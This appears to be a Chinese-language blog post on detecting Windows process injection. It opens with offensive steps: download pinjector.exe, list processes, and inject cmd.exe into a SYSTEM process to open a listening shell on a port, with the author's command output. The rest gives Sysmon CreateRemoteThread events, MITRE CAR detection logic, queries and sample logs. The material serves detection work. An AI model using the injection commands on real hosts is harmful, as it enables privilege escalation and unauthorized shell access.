进程注入数据采集，sysmon可以获得CreateRemoteThread信息，car中进程注入检测方式

下载地址：https://www.tarasco.org/security/Process_Injector/processinjector.zip

进程注入（pinjector.exe）提权
进程注入将pinjector注入到用户的进程里一起运行，进而同时拥有了对应的权限。
是一种比较隐蔽的手段，不会创建新的进程，很难发现，但是上传至目标主机时可能会报毒

从http://www.tarasco.org/security/Process_Injector/ 下载pinjector.exe文件。
放到主机的c盘根目录下

  Pinjector.exe -l 列出进程，列出的所有进程都可以利用（找system对应权限的进程）

 pinjector.exe -p 456 cmd 5959

我自己本机尝试：

D:\bonelee\processinjector\Process Injector>pinjector -p 12304 cmd.exe 6688
Privilege Switcher for Win32(Private version)
(c) 2006 Andres Tarasco - atarasco@gmail.com

[+] Trying to execute cmd.exe to 12304 as: DESKTOP-PTV6LGO \ admin
[+] Code inyected... ; )

D:\tmp\processinjector\Process Injector>Pinjector64.exe
Privilege Switcher for Win32(Private version)
(c) 2006 Andres Tarasco - atarasco@gmail.com

Usage:
 inject.exe -l                    (Enumerate Credentials)
 inject.exe -p <pid> <cmd> <port> (Inject into PID)

D:\tmp\processinjector\Process Injector>Pinjector64.exe  -p 30432 cmd.exe 9999
Privilege Switcher for Win32(Private version)
(c) 2006 Andres Tarasco - atarasco@gmail.com

[+] Trying to execute cmd.exe to 30432 as: xxx
[+] Code inyected... ; )

D:\tmp\processinjector\Process Injector>nc localhost 9999
'nc' 不是内部或外部命令，也不是可运行的程序
或批处理文件。

　　

使用sysmon采集数据：

 

 

CreateRemoteThread detected:
RuleName: -
UtcTime: 2022-04-19 09:57:20.846
SourceProcessGuid: {7f59fefd-8780-625e-c811-000000002700}
SourceProcessId: 3940
SourceImage: D:\bonelee\processinjector\Process Injector\pinjector.exe
TargetProcessGuid: {7f59fefd-333e-625e-6f02-000000002700}
TargetProcessId: 12304
TargetImage: C:\Program Files (x86)\Notepad++\notepad++.exe
NewThreadId: 2224
StartAddress: 0x0000000003900000
StartModule: -
StartFunction: -
SourceUser: DESKTOP-PTV6LGO\admin
TargetUser: DESKTOP-PTV6LGO\admin

 

看下car的描述，如何检测进程注入的：https://car.mitre.org/analytics/CAR-2013-10-002/

CAR-2013-10-002: DLL Injection via Load Library

Microsoft Windows 允许进程在具有相同权限级别的其他进程中远程创建线程。此功能是通过 Windows API CreateRemoteThread提供的。Windows 和第三方软件都将此功能用于合法目的。例如，Windows 进程csrss.exe在程序中创建线程以向注册的回调例程发送信号。攻击者和基于主机的安全软件都使用此功能来注入 DLL，但目的截然不同。攻击者可能会注入程序以逃避防御或绕过用户帐户控制，但安全程序可能会这样做以加强对 API 调用的监控。DLL 注入最常见的方法之一是通过 Windows API LoadLibrary。

• 使用VirtualAllocEx在目标程序中分配内存
• 使用WriteProcessMemory 写入要注入该程序的 DLL 的名称
• 创建一个新线程并使用 API CreateRemoteThread将其入口点设置为LoadLibrary。

可以通过跨进程查找线程创建并解析入口点以确定函数名称来检测此行为。如果函数是LoadLibraryAor LoadLibraryW，那么远程线程的意图显然是注入一个 DLL。在这种情况下，必须检查源进程，以便在它既是预期进程又是受信任进程时可以忽略它。

Submission Date: 2013/10/07

Update Date:

Information Domain: Host

Data Subtypes: Process DLL

Analytic Type: TTP

Applicable Platforms: Windows

Contributors: MITRE

Microsoft Windows allows for processes to remotely create threads within other processes of the same privilege level. This functionality is provided via the Windows API CreateRemoteThread. Both Windows and third-party software use this ability for legitimate purposes. For example, the Windows process csrss.exe creates threads in programs to send signals to registered callback routines. Both adversaries and host-based security software use this functionality to inject DLLs, but for very different purposes. An adversary is likely to inject into a program to evade defenses or bypass User Account Control, but a security program might do this to gain increased monitoring of API calls. One of the most common methods of DLL Injection is through the Windows API LoadLibrary.

• Allocate memory in the target program with VirtualAllocEx
• Write the name of the DLL to inject into this program with WriteProcessMemory
• Create a new thread and set its entry point to LoadLibrary using the API CreateRemoteThread.

This behavior can be detected by looking for thread creations across processes, and resolving the entry point to determine the function name. If the function is LoadLibraryA or LoadLibraryW, then the intent of the remote thread is clearly to inject a DLL. When this is the case, the source process must be examined so that it can be ignored when it is both expected and a trusted process.

ATT&CK Detections

Technique	Subtechnique(s)	Tactic(s)	Level of Coverage
Process Injection	Dynamic-link Library Injection	Defense Evasion	Moderate
Abuse Elevation Control Mechanism	Bypass User Account Control	Privilege Escalation	Moderate

D3FEND Techniques

ID	Name
D3-SCA	System Call Analysis

Data Model References

Object	Action	Field
thread	remote_create	src_pid
thread	remote_create	start_function

Implementations

Pseudocode

Search for remote thread creations that start at LoadLibraryA or LoadLibraryW. Depending on the tool, it may provide additional information about the DLL string that is an argument to the function. If there is any security software that legitimately injects DLLs, it must be carefully whitelisted.

remote_thread = search Thread:RemoteCreate
remote_thread = filter (start_function == "LoadLibraryA" or start_function == "LoadLibraryW")
remote_thread = filter (src_image_path != "C:\Path\To\TrustedProgram.exe")

output remote_thread

Logpoint, LogPoint native

LogPoint version of the above pseudocode.

norm_id=WindowsSysmon event_id=8 start_function IN ["LoadLibraryA", "LoadLibraryW"] -source_image="C:\Path\To\TrustedProgram.exe"

True Positives

Mordor (sysmon)

Sysmon event from the Mordor Empire DLL Injection dataset.

Full Event

Event Snippet

{
	"@event_date_creation": "2019-05-18T22:15:33.007Z",
	"@timestamp": "2019-05-18T22:15:33.697Z",
	"@version": "1",
	"action": "createremotethread",
	"event_id": 8,
	"log_ingest_timestamp": "2019-05-18T22:15:33.697Z",
	"log_name": "Microsoft-Windows-Sysmon/Operational",
	"opcode": "Info",
	"process_guid": "03ba39f5-50b2-5ce0-0000-00109995c501",
	"process_id": "5452",
	"process_name": "powershell.exe",
	"process_path": "c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe",
	"process_target_guid": "03ba39f5-8320-5ce0-0000-00101ec72502",
	"process_target_id": "3124",
	"process_target_name": "notepad.exe",
	"process_target_path": "c:\\\\windows\\\\system32\\\\notepad.exe",
	"provider_guid": "5770385f-c22a-43e0-bf4c-06f5698ffbd9",
	"record_number": "2273503",
	"source_name": "Microsoft-Windows-Sysmon",
	"task": "CreateRemoteThread detected (rule: CreateRemoteThread)",
	"thread_id": 3144,
	"thread_new_id": "7940",
	"thread_start_address": "0x00007FFECED8F220",
	"thread_start_function": "LoadLibraryA",
	"thread_start_module": "C:\\\\Windows\\\\System32\\\\KERNEL32.DLL",
	"type": "wineventlog",
	"user_reporter_domain": "NT AUTHORITY",
	"user_reporter_name": "SYSTEM",
	"user_reporter_sid": "S-1-5-18",
	"user_reporter_type": "User"
}

完整的数据采集：

{
    "_index":"logs-endpoint-winevent-sysmon-2019.05.18",
    "_type":"_doc",
    "_id":"b3c3006563ea4a0c2cb4c43191ea10c28f794fbb",
    "_score":1,
    "_source":{
       "process_guid":"03ba39f5-50b2-5ce0-0000-00109995c501",
       "user_reporter_domain":"NT AUTHORITY",
       "process_target_id":"3124",
       "beat_name":"WECserver",
       "beat_version":"6.7.0",
       "user_reporter_type":"User",
       "thread_id":3144,
       "log_name":"Microsoft-Windows-Sysmon/Operational",
       "record_number":"2273503",
       "@event_date_creation":"2019-05-18T22:15:33.007Z",
       "log_ingest_timestamp":"2019-05-18T22:15:33.697Z",
       "@version":"1",
       "type":"wineventlog",
       "level":"Information",
       "user_reporter_name":"SYSTEM",
       "z_logstash_type":"wineventlog",
       "process_target_path":"c:\\\\windows\\\\system32\\\\notepad.exe",
       "process_target_guid":"03ba39f5-8320-5ce0-0000-00101ec72502",
       "version":2,
       "@timestamp":"2019-05-18T22:15:33.697Z",
       "thread_start_address":"0x00007FFECED8F220",
       "process_target_name":"notepad.exe",
       "z_logstash_pipeline":[
          "0098",
          "fingerprint-0099-001",
          "fingerprint-0099-003",
          "winlogbeat_6-field_nest_cleanup",
          "1500",
          "1521",
          "1522",
          "1523_7",
          "1523_8",
          "1524_8",
          "1524_11",
          "1524_12",
          "1524_15",
          "1531",
          "1541_1",
          "1541_3",
          "1544_2",
          "1544_3",
          "1544_5",
          "1544_7",
          "winevent-hostname-cleanup",
          "winevent-user_reporter_name-is-machine-account",
          "copy-8802-001",
          "copy-8802-002"
       ],
       "task":"CreateRemoteThread detected (rule: CreateRemoteThread)",
       "opcode":"Info",
       "process_id":"5452",
       "host":{
          "name":"WECserver"
       },
       "source_name":"Microsoft-Windows-Sysmon",
       "event_id":8,
       "provider_guid":"5770385f-c22a-43e0-bf4c-06f5698ffbd9",
       "thread_start_function":"LoadLibraryA",
       "action":"createremotethread",
       "process_name":"powershell.exe",
       "thread_new_id":"7940",
       "meta_user_reporter_name_is_machine":"false",
       "beat_hostname":"WECserver",
       "user_reporter_sid":"S-1-5-18",
       "process_path":"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe",
       "z_original_message":"CreateRemoteThread detected:\\nRuleName: \\nUtcTime: 2019-05-18 22:15:33.007\\nSourceProcessGuid: {03ba39f5-50b2-5ce0-0000-00109995c501}\\nSourceProcessId: 5452\\nSourceImage: C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\nTargetProcessGuid: {03ba39f5-8320-5ce0-0000-00101ec72502}\\nTargetProcessId: 3124\\nTargetImage: C:\\\\Windows\\\\System32\\\\notepad.exe\\nNewThreadId: 7940\\nStartAddress: 0x00007FFECED8F220\\nStartModule: C:\\\\Windows\\\\System32\\\\KERNEL32.DLL\\nStartFunction: LoadLibraryA",
       "user":{
 
       },
       "host_name":"hr001.shire.com",
       "thread_start_module":"C:\\\\Windows\\\\System32\\\\KERNEL32.DLL"
    },
    "fields":{
       "@timestamp":[
          "2019-05-18T22:15:33.697Z"
       ],
       "@event_date_creation":[
          "2019-05-18T22:15:33.007Z"
       ],
       "log_ingest_timestamp":[
          "2019-05-18T22:15:33.697Z"
       ]
    }
 }